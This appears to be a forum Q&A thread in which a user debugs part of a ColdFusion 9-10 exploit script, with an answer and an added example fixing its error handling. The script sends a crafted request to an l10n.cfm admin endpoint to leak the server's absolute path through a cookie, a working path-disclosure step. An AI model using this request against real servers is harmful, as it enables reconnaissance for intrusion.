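I am trying to recreate the exploit that was used on a customer's website. I spoke with a security analyst earlier, and he said he would review it on August 8.
Here is the part of the code where I am getting the error: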
    def getpath(protocol,target):
        # Leverage a path disclosure to get the absolute path on CF9-10
        print "[*] Testing for path disclosure"
        abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
        if "set-cookie" in abspathdata.keys():
            try:
                abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
                print "[*] Absolute path obtained: %s" % abspath
                if abspath[0] == "/":
                    print "[*] Detected Linux"
                    operatingsystem = "linux"
                elif abspath[1] == ":":
                    print "[*] Detected Windows"
                    operatingsystem = "windows 95 with bonzibuddy"
                else:
                    print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
                    operatingsystem = "refrigerator"
            except:
                print "[?] OS detection failure. Continuing with fingerprint."
        else:
            print "[?] OS detection failure. Continuing with fingerprint."
        return abspath,operatingsystem
and
    abspath,operatingsystem = getpath(protocol,target)
    coldfusion = fingerprintcf(protocol,target)
The error I get:
    Traceback (most recent call last):
      File "C:\Python27\Scripts\cf.py", line 110, in <module>
        abspath,operatingsystem = getpath(protocol,target)
      File "C:\Python27\Scripts\cf.py", line 78, in getpath
        return abspath,operatingsystem
    UnboundLocalError: local variable 'abspath' referenced before assignment
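Answer 0 (score: 0)
You are only assigning the abspath variable in one branch of your code. If the first condition ("set-cookie" in abspathdata.keys()) is false (or if something in the urllib.unquote expression raises an exception), the variable is never given a value. When you try to return it, you get the exception you describe.
I don't understand your code well enough to suggest what you should return in this error case, but it should probably be something. Here is an example of how to fix the code (returning a nonsense path):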
        if "set-cookie" in abspathdata.keys():
            try:
                abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
                # I'll skip lots of stuff here
            except:
                print "[?] OS detection failure. Continuing with fingerprint."
                abspath = "invalid!" # don't forget this case either!
        else:
            print "[?] OS detection failure. Continuing with fingerprint."
            abspath = "invalid!"
        return abspath,operatingsystem
Note that raising an exception might be more appropriate than returning nonsense.
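
Added example (not part of the answer above and not code from the original script): one way to apply the answer's closing suggestion, so that every path through the function either returns both values or raises. It is written for Python 3 and only parses an already-received header mapping; the names `parse_analyzer_path`, `PathDetectionError`, `describe`, the OS labels and the sample headers are assumptions constructed for illustration.

```python
from urllib.parse import unquote  # Python 3 location of urllib.unquote


class PathDetectionError(ValueError):
    """Raised when the response headers do not yield an absolute path."""


def parse_analyzer_path(headers):
    """Return (abspath, operatingsystem) from a response-header mapping.

    Both names are bound on every returning path; every failure raises,
    so the caller can never hit an UnboundLocalError.
    """
    # Header names are case-insensitive; normalise before the lookup.
    lowered = {k.lower(): v for k, v in headers.items()}
    cookie = lowered.get("set-cookie")
    if cookie is None:
        raise PathDetectionError("no Set-Cookie header in response")

    marker = "ANALYZER_DIRECTORY="
    if marker not in cookie:
        raise PathDetectionError("ANALYZER_DIRECTORY cookie not present")

    abspath = unquote(cookie.split(marker, 1)[1].split(";", 1)[0])
    if not abspath:
        # The original abspath[0] check would raise IndexError here.
        raise PathDetectionError("ANALYZER_DIRECTORY cookie is empty")

    if abspath.startswith("/"):
        operatingsystem = "linux"
    elif len(abspath) > 1 and abspath[1] == ":":
        operatingsystem = "windows"
    else:
        operatingsystem = "unknown"
    return abspath, operatingsystem


def describe(headers):
    """Caller-side handling: catch the specific exception, not a bare except."""
    try:
        return parse_analyzer_path(headers)
    except PathDetectionError as exc:
        return None, "detection failed: %s" % exc


# Constructed sample headers (not captured from a real server).
SAMPLE_OK = {"Set-Cookie": "ANALYZER_DIRECTORY=C%3A%5CColdFusion9%5Cwwwroot; path=/"}
SAMPLE_MISSING = {"Content-Type": "text/html"}
```

Catching only `PathDetectionError` keeps unrelated bugs visible, which the bare `except:` in the original function would have hidden.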